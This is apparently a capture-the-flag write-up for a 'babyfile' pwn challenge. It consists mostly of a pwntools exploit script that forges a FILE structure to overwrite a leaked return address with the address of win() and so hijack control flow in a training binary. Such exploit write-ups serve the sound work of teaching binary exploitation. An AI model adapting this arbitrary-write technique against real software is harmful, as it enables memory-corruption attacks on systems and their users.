(File Struct Exploits) level 4

Information

  • category: pwn

Description

Harness the power of FILE structs to arbitrarily read/write data to hijack control flow.

Exploit

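from pwn import *

# Load the challenge binary and use it to set pwntools' context (arch, bits, endianness).
elf = context.binary = ELF("/challenge/babyfile_level4")
p = elf.process()

def exploit():
    # The challenge prints a hex address after "stored at: "; parse it.
    p.recvuntil(b"stored at: ")
    ret_address = int(p.recvline()[:-1], 16)

    # Build a FILE struct whose buffer covers 266 bytes starting at ret_address,
    # so the program's next read through this FILE stores stdin data there.
    fp = FileStructure()
    payload = fp.read(ret_address, 266)
    p.send(payload)

    # Fill that buffer: the address of win() (8 bytes) plus 258 bytes of padding = 266 bytes.
    p.send(p64(elf.sym['win']) + b"\x00" * 258)
    p.interactive()

def main():
    exploit()

if __name__ == "__main__":
    main()
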
This post is licensed under CC BY 4.0 by the author.